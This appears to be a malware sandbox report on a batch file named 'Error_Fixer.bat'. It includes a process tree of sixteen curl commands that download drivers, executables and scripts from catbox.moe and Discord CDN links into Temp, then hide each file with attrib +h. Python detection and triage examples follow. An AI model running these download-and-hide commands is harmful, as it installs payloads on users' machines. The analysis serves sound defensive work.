Analysis

  • max time kernel
    11s
  • max time network
    14s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    11-11-2024 14:34

General

  • Target

    Error_Fixer.bat

  • Size

    4KB

  • MD5

    0f0eeac1ee1ca486d3ba81dce6232a84

  • SHA1

    a199064741781c5a3594b0a01f4f48f1f96da459

  • SHA256

    7b58ae949a5c584d2cf3763fa0117bcbc3fddec0e080862b43c466ab5812e140

  • SHA512

    0666c250932b843bd0747812d2bf49e96e21f95eafb332108940f96eb6694cbc9753f2cfbf53c0d693798482c166499165df910c169a8a10808c21cfea3c2a54

  • SSDEEP

    96:biskkc0rjx0rwZA0rseo0refTrp0r/5VOY0rha0rIQ0reveK0roz0rdmWj0rT3DI:biskkc0rjx0rwZA0rseo0reLrp0rzOYT

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Views/modifies file attributes (1 TTP, 16 IoCs)
  • cURL User-Agent (16 IoCs)

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Error_Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Windows\system32\curl.exe
      curl "https://files.catbox.moe/53lsww.sys" --output "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"
      2⤵
      PID:4016
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"
      2⤵
      • Views/modifies file attributes
      PID:3732
    • C:\Windows\system32\curl.exe
      curl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"
      2⤵
      PID:3660
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"
      2⤵
      • Views/modifies file attributes
      PID:4488
    • C:\Windows\system32\curl.exe
      curl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"
      2⤵
      PID:1524
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"
      2⤵
      • Views/modifies file attributes
      PID:1720
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816653851889674/fb4953.exe?ex=66fdd630&is=66fc84b0&hm=ddd23031710a90877555b97441d6a6c841dcefb8b5f0c8ae6934f5461224878b&" --output "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"
      2⤵
      PID:2792
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"
      2⤵
      • Views/modifies file attributes
      PID:3816
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654128840816/ss2031.exe?ex=66fdd630&is=66fc84b0&hm=bee0f45ce6f1cd78183751ce16c463d257a73191aaff40c31ec35658e68942c0&" --output "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"
      2⤵
      PID:3112
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"
      2⤵
      • Views/modifies file attributes
      PID:460
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654476841031/db3289.exe?ex=66fdd630&is=66fc84b0&hm=d9b3162be67de7afbb7005cab595210eb9b2573072607457502343127074b441&" --output "C:\Users\Admin\AppData\Local\Temp\db3289.exe"
      2⤵
      PID:2216
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\db3289.exe"
      2⤵
      • Views/modifies file attributes
      PID:4348
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817450715254869/iqvsw64e.cat?ex=66fdd6ee&is=66fc856e&hm=1c4c23b3398a45f1d68ea0f2a8f8a3d12be5cd8af0c361d5be1c7dc1154705f6&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"
      2⤵
      PID:3296
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"
      2⤵
      • Views/modifies file attributes
      PID:4820
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451172560997/iqvsw64e.inf?ex=66fdd6ee&is=66fc856e&hm=0035d48597abcd75dde99a54e085c2fa49f97ce0808b678f10a3ddedfc60ca07&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"
      2⤵
      PID:744
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"
      2⤵
      • Views/modifies file attributes
      PID:4084
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451725946943/iqvsw64e.sys?ex=66fdd6ee&is=66fc856e&hm=7bf1dc5baf23eb3aeebf279354f48c00b576de307a799565e6f1e155eb35428b&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"
      2⤵
      PID:4748
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"
      2⤵
      • Views/modifies file attributes
      PID:3344
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452082597960/eu4837.exe?ex=66fdd6ee&is=66fc856e&hm=d0521b201403836bae28b2b157bb108b0545c187508d3e25867f994bfd5cd36a&" --output "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"
      2⤵
      PID:2244
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"
      2⤵
      • Views/modifies file attributes
      PID:1760
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452392972338/i3782.bat?ex=66fdd6ee&is=66fc856e&hm=5ded14da6d4c18eb3c1536ec11c8a82e7f06d7adbf7f55f456361982f75aca0f&" --output "C:\Users\Admin\AppData\Local\Temp\i3782.bat"
      2⤵
      PID:1400
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\i3782.bat"
      2⤵
      • Views/modifies file attributes
      PID:408
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347121901571/rn3987.exe?ex=66fdd7c4&is=66fc8644&hm=d46191124bae1eacd54dc1ed2d117d1a87c76d40efdbe31c51dfe08d6af10ccf&" --output "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"
      2⤵
      PID:2932
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"
      2⤵
      • Views/modifies file attributes
      PID:2556
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290820947791839253/RTloLib64.dll?ex=66fdda30&is=66fc88b0&hm=1ec68936e6bdc1f08b8dd9194ab515361e52dadac64ae2f0493bb633c0fe18ff&" --output "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"
      2⤵
      PID:1316
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"
      2⤵
      • Views/modifies file attributes
      PID:1644
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347809640589/rtkio64.sys?ex=66fdd7c4&is=66fc8644&hm=d5740800f8fdb4026e655b1a00c7d12e7dd30937aa7c9e58714679e5fddbb4f4&" --output "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"
      2⤵
      PID:3592
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"
      2⤵
      • Views/modifies file attributes
      PID:3728
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818348233523303/rtkiow10x64.sys?ex=66fdd7c4&is=66fc8644&hm=799739568a5ba236a008ee1cf3a9739b6b814ba7b82d4df9263e30f1505d8a43&" --output "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"
      2⤵
      PID:1892
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"
      2⤵
      • Views/modifies file attributes
      PID:2788
    • C:\Windows\system32\curl.exe
      curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290821109918466121/Volumeid64.exe?ex=66fdda56&is=66fc88d6&hm=f046faf7bd86b36cae97cc026dcb2dd6139cdae9109ac8d9e277e03dfc04fac7&" --output "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"
      2⤵
      PID:3536
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"
      2⤵
      • Views/modifies file attributes
      PID:3740
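The tree above is sixteen near-identical pairs under one cmd.exe: curl writes a file into the user's Temp folder, then attrib +h hides it. The Python below is an added example, not part of the sandbox report, showing the detection logic an analyst would run over process-creation telemetry for exactly this pattern: pair each curl download with a later attrib +h on the same path issued by the same parent, and flag pairs that land an executable, driver or script extension in a Temp directory. The events are constructed from the page's command lines (PIDs and command lines copied from the tree; cmd.exe's parent PID 1000 and the two README/notes control events are made up so the script has something it must not flag).

```python
"""Pair curl downloads with the attrib +h that hides them.

Added example, not part of the sandbox report. EVENTS is constructed from the
command lines in the process tree: PIDs and command lines are copied from the
page; cmd.exe's parent (1000) and the two README/notes control events are
made up so the script has something it must NOT flag.
"""
import ntpath
import re
from urllib.parse import urlparse

# Extensions that should not normally be fetched straight into a user's Temp folder.
RISKY_EXT = {".sys", ".exe", ".dll", ".bat", ".cmd", ".cat", ".inf", ".ps1"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# curl's output switch (--output or -o) followed by a quoted or bare path.
CURL_OUT_RE = re.compile(r'(?:--output|-o)\s+(?:"([^"]+)"|(\S+))', re.I)
URL_RE = re.compile(r'https?://[^\s"]+', re.I)
# attrib ... +h <path>; other switches may come before +h.
ATTRIB_HIDE_RE = re.compile(r'\+h\s+(?:"([^"]+)"|(\S+))', re.I)

EVENTS = [
    {"pid": 4332, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Error_Fixer.bat"'},
    {"pid": 4016, "ppid": 4332, "image": r"C:\Windows\system32\curl.exe",
     "cmdline": r'curl "https://files.catbox.moe/53lsww.sys" --output "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"'},
    {"pid": 3732, "ppid": 4332, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": r'attrib +h "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"'},
    {"pid": 2792, "ppid": 4332, "image": r"C:\Windows\system32\curl.exe",
     "cmdline": r'curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816653851889674/fb4953.exe?ex=66fdd630&is=66fc84b0&hm=ddd23031710a90877555b97441d6a6c841dcefb8b5f0c8ae6934f5461224878b&" --output "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"'},
    {"pid": 3816, "ppid": 4332, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": r'attrib +h "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"'},
    {"pid": 3592, "ppid": 4332, "image": r"C:\Windows\system32\curl.exe",
     "cmdline": r'curl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347809640589/rtkio64.sys?ex=66fdd7c4&is=66fc8644&hm=d5740800f8fdb4026e655b1a00c7d12e7dd30937aa7c9e58714679e5fddbb4f4&" --output "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"'},
    {"pid": 3728, "ppid": 4332, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": r'attrib +h "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"'},
    # Constructed control: a download that is never hidden (must not be flagged).
    {"pid": 5000, "ppid": 4332, "image": r"C:\Windows\system32\curl.exe",
     "cmdline": r'curl "https://example.invalid/README.txt" -o "C:\Users\Admin\Documents\README.txt"'},
    # Constructed control: hiding a file curl never fetched (must not be flagged).
    {"pid": 5001, "ppid": 4332, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": r'attrib +h "C:\Users\Admin\Documents\notes.txt"'},
]


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def triage(events):
    """One finding per file that curl wrote and a sibling attrib.exe then hid."""
    fetched = {}      # lowercase output path -> download record
    findings = []
    for ev in events:
        name = _basename(ev["image"])
        if name == "curl.exe":
            m_out = CURL_OUT_RE.search(ev["cmdline"])
            m_url = URL_RE.search(ev["cmdline"])
            if m_out and m_url:
                path = m_out.group(1) or m_out.group(2)
                fetched[path.lower()] = {"pid": ev["pid"], "ppid": ev["ppid"],
                                         "url": m_url.group(0), "path": path}
        elif name == "attrib.exe":
            m = ATTRIB_HIDE_RE.search(ev["cmdline"])
            if not m:
                continue
            path = m.group(1) or m.group(2)
            rec = fetched.get(path.lower())
            # Only pair a hide with a download issued by the same parent process.
            if rec is None or rec["ppid"] != ev["ppid"]:
                continue
            ext = ntpath.splitext(path)[1].lower()
            in_temp = bool(TEMP_DIR_RE.search(path))
            findings.append({
                "parent_pid": ev["ppid"], "curl_pid": rec["pid"], "attrib_pid": ev["pid"],
                "host": urlparse(rec["url"]).hostname, "path": path, "ext": ext,
                "in_temp": in_temp, "risky": in_temp and ext in RISKY_EXT,
            })
    return findings


def hosts(findings):
    """Distinct download hosts, for blocking and pivoting."""
    return sorted({f["host"] for f in findings})


def risky_extensions(findings):
    return sorted({f["ext"] for f in findings if f["risky"]})


if __name__ == "__main__":
    results = triage(EVENTS)
    for f in results:
        flag = "RISKY" if f["risky"] else "info "
        print(f"{flag} parent={f['parent_pid']} {f['host']} -> {f['path']}")
    print("hosts:", hosts(results))
```

Pairing on the same parent PID is what keeps this precise: a lone curl to Temp or a lone attrib +h is common on developer machines, while a batch that does both, sixteen times, from one cmd.exe is not. Run against the full tree the script would return all sixteen pairs and the two hosts seen here.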

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys

    Filesize

    36KB

    MD5

    9accebd928a8926fecf317f53cd1c44e

    SHA1

    d7d71135cc3cf7320f8e63cefb6298dd44e5b1d4

    SHA256

    811e5d65df60dfb8c6e1713da708be16d9a13ef8dfcd1022d8d1dda52ed057b2

    SHA512

    2563402cc8e1402d9ac3a76a72b7dab0baa4ecd03629cc350e7199c7e1e1da4000e665bd02ac3a75fd9883fa678b924c8b73d88d8c50bf9d2ae59254a057911e

  • C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys

    Filesize

    18KB

    MD5

    785045f8b25cd2e937ddc6b09debe01a

    SHA1

    029c678674f482ababe8bbfdb93152392457109d

    SHA256

    37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

    SHA512

    40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

  • C:\Users\Admin\AppData\Local\Temp\fb4953.exe

    Filesize

    36B

    MD5

    a1ca4bebcd03fafbe2b06a46a694e29a

    SHA1

    ffc88125007c23ff6711147a12f9bba9c3d197ed

    SHA256

    c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

    SHA512

    6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e
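Two checks are worth doing before treating the files in this list as the payloads the batch file was meant to drop. First, fb4953.exe is 36 bytes; a PE image needs at least the 64-byte DOS header, so whatever curl wrote there is not an executable. Second, the Discord CDN links carry ex, is and hm parameters: ex and is are hex Unix timestamps for expiry and issue time and hm is the link signature. ex=66fdd630 decodes to 2024-10-02 23:24:32 UTC, about six weeks before the 11-11-2024 submission, so those URLs had already expired when the sandbox ran and the 36-byte body is most likely the CDN's response at that time rather than the original attachment. The two catbox.moe .sys files (36KB and 18KB) are the downloads that can plausibly have triggered "Downloads MZ/PE file". The Python below is an added example, not part of the report: it decodes the link window and applies a minimal PE header sanity check. The analysis timestamp is assumed to be UTC (the report does not give a zone), and the two byte strings are constructed samples, not the real file contents.

```python
"""Decode a Discord CDN signed-link window and sanity-check a download as PE.

Added example, not from the sandbox report. ANALYSIS_TIME assumes the report's
submission stamp is UTC; NOT_A_PE and MINIMAL_PE are constructed bytes, not the
contents of any file in the Downloads list.
"""
import struct
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# URL copied from the process tree (fb4953.exe).
FB4953_URL = ("https://cdn.discordapp.com/attachments/1112031522426462218/"
              "1290816653851889674/fb4953.exe?ex=66fdd630&is=66fc84b0"
              "&hm=ddd23031710a90877555b97441d6a6c841dcefb8b5f0c8ae6934f5461224878b&")
ANALYSIS_TIME = "2024-11-11T14:34:00+00:00"   # assumption: submission stamp read as UTC


def _iso(epoch):
    return datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat()


def decode_cdn_window(url):
    """'is' (issued) and 'ex' (expires) are hex Unix timestamps in the query string."""
    q = parse_qs(urlparse(url).query)
    issued = int(q["is"][0], 16)
    expires = int(q["ex"][0], 16)
    return {"issued_epoch": issued, "expires_epoch": expires,
            "issued": _iso(issued), "expires": _iso(expires),
            "window_seconds": expires - issued}


def expired_at(url, when_iso):
    """True if the link's expiry lies before the given (timezone-aware) instant."""
    when = int(datetime.fromisoformat(when_iso).timestamp())
    return decode_cdn_window(url)["expires_epoch"] < when


def looks_like_pe(data):
    """Minimal PE check: 'MZ', a full 64-byte DOS header, e_lfanew -> 'PE\\0\\0'."""
    if len(data) < 64 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed: 36 bytes, the same size as fb4953.exe, and clearly not a PE.
NOT_A_PE = b"x" * 36


def _minimal_pe_stub():
    """Constructed: the smallest byte string the check above accepts."""
    hdr = bytearray(64)                       # IMAGE_DOS_HEADER
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 64)     # e_lfanew -> right after the DOS header
    return bytes(hdr) + b"PE\0\0" + bytes(20)  # NT signature + bare IMAGE_FILE_HEADER


MINIMAL_PE = _minimal_pe_stub()


if __name__ == "__main__":
    w = decode_cdn_window(FB4953_URL)
    print(f"issued  {w['issued']}\nexpires {w['expires']} (window {w['window_seconds']} s)")
    print("expired at analysis time:", expired_at(FB4953_URL, ANALYSIS_TIME))
    print("36-byte body is PE:", looks_like_pe(NOT_A_PE))
    print("stub is PE:", looks_like_pe(MINIMAL_PE))
```

The practical consequence for triage: hashes of fb4953.exe and the other Discord-hosted files in this run identify an expired-link response, not the attacker's binaries, and should not be pushed to a blocklist as if they were. Re-running the sample will not help either; the hosting account controls whether those attachments are ever re-shared with fresh signatures.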